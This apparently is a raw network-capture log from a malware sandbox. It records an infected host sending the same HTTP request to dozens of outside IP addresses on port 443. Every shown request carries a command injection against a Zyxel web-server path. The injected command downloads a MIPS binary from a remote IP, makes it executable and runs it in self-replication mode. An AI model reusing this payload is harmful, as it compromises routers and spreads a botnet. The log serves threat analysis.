                                            Feb 2, 2024 06:21:29.979515076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8777192.168.2.154670053.132.164.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.979561090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8778192.168.2.154765661.194.129.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.979587078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8779192.168.2.154993097.25.97.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.979621887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8780192.168.2.1547640113.11.168.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.979686022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8781192.168.2.1537624171.78.58.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.979715109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8782192.168.2.1537420198.118.108.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.979764938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8783192.168.2.155371838.27.7.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.979824066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8784192.168.2.154194219.116.149.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.979851007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8785192.168.2.1554666208.87.97.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.979885101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8786192.168.2.1558942188.170.129.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.979916096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8787192.168.2.154623820.114.124.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.979964972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8788192.168.2.1534760112.139.2.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.979999065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8789192.168.2.1548584188.255.0.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980058908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8790192.168.2.1559008111.201.35.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980094910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8791192.168.2.155697613.28.204.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980143070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8792192.168.2.1544096133.167.82.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980164051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8793192.168.2.153315213.227.95.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980204105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8794192.168.2.1539788110.56.209.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980253935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8795192.168.2.155352462.167.220.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980292082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8796192.168.2.1552190157.56.241.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980336905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8797192.168.2.154348824.33.29.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980387926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8798192.168.2.154150496.80.28.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980401039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8799192.168.2.1553932126.139.174.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980453968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8800192.168.2.1538964201.250.220.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980504990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8801192.168.2.1553360172.207.153.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980539083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8802192.168.2.1545532104.193.81.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980583906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8803192.168.2.1549622149.218.201.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980598927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8804192.168.2.1538244181.109.21.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980652094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8805192.168.2.1542158105.134.172.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980715036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8806192.168.2.1539698190.201.101.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980745077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8807192.168.2.1550632128.84.241.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980760098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8808192.168.2.1553130155.202.193.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980803967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8809192.168.2.154217086.14.52.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980822086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8810192.168.2.1540874158.139.154.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980876923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8811192.168.2.15587002.156.120.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980906010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8812192.168.2.155743691.83.152.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980954885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8813192.168.2.1550958150.23.227.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.980978012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8814192.168.2.1556402220.72.187.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981015921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8815192.168.2.155622660.43.205.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981056929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8816192.168.2.153505666.22.231.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981086969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8817192.168.2.154560863.83.99.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981127977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8818192.168.2.1557622206.210.175.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981185913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8819192.168.2.1533960184.83.112.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981199980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8820192.168.2.1552396219.175.125.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981255054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8821192.168.2.1546230197.114.253.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981283903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8822192.168.2.1552568137.61.165.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981318951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8823192.168.2.153595613.17.134.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981354952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8824192.168.2.154707827.201.241.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981394053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8825192.168.2.153345880.180.20.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981445074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8826192.168.2.1557322209.231.205.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981492043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8827192.168.2.1536900189.70.193.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981519938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8828192.168.2.154630643.54.186.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981560946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8829192.168.2.1553244158.70.190.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981589079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8830192.168.2.154786618.148.243.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981638908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8831192.168.2.1539954121.218.142.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981683969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8832192.168.2.154437813.31.11.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981717110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8833192.168.2.1554970114.3.225.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981754065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8834192.168.2.154800058.30.208.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981796980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8835192.168.2.155902265.112.39.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981828928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8836192.168.2.1553462102.232.132.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981882095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8837192.168.2.1552698141.158.225.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981905937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8838192.168.2.1539888165.203.169.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981945038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8839192.168.2.156099485.85.222.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:29.981991053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8840192.168.2.156025259.24.179.143443
                                            TimestampBytes transferredDirectionData
